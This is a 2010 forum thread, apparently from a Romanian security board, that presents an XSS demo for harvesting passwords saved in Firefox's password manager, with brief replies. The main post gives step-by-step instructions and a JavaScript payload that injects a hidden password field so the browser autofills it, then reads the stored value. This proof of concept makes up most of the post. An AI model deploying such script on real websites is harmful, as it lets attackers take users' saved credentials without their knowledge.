XSS demo for stealing passwords from the Firefox password manager

begood · March 16, 2010

Similar technique may work for Internet Explorer, Safari, Chrome, Opera, etc. Your mileage may vary.

1. Save a username / password in Firefox's password manager by filling out the form below with fake data.

2. Clicking "Remember" when asked.

3. Then click back.

THE XSS EXPLOIT PAYLOAD 

<script> 
document.write('<form><input id=p type=password style=visibility:hidden></form>'); 
setTimeout('alert("Password: " + document.getElementById("p").value)', 100); 
</script>

look here :

XSS demo for stealing passwords from the Firefox Password Manager

malsploit · March 16, 2010

chrome://browser/content/browser.xul

merge doar la mozzilla

RSnake's Vulnerability Lab

AlStar · March 16, 2010

Folositor. Thanks.

Sign In

XSS demo for stealing passwords from the Firefox password manager

Recommended Posts

begood

malsploit

AlStar

Join the conversation

Browse

Activity

Pages